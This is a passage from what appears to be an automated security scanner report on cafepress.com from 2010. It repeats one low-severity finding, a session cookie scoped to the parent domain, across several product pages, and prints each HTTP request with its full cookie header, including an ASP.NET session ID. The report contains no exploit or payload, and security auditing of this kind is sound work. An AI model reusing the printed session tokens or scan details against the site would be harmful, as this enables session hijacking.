Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 112197
Date: Sun, 26 Dec 2010 13:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 112197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.63. http://www.cafepress.com/make/custom-thermos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-thermos

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.64. http://www.cafepress.com/make/custom-water-bottles previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-water-bottles

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.65. http://www.cafepress.com/make/holiday-invitations previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/holiday-invitations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 55521
Date: Sun, 26 Dec 2010 13:47:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.66. http://www.cafepress.com/make/holiday-photo-cards previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/holiday-photo-cards

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 58720
Date: Sun, 26 Dec 2010 13:47:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.67. http://www.cafepress.com/make/makeacard.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/makeacard.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/makeacard.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: /cp/bing/errorpage.html?aspxerrorpath=/make/makeacard.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Content-Length: 189
Date: Sun, 26 Dec 2010 13:48:17 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fcp%2fbing%2ferrorpage.html%3faspxerrorpath%3d%2fmake%2fmakeacard.aspx">here</a>.</h2>
</body></html>

2.68. http://www.cafepress.com/make/personalized-gifts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/personalized-gifts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 71867
Date: Sun, 26 Dec 2010 13:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.69. http://www.cafepress.com/make/personalized-ornaments previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/personalized-ornaments

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
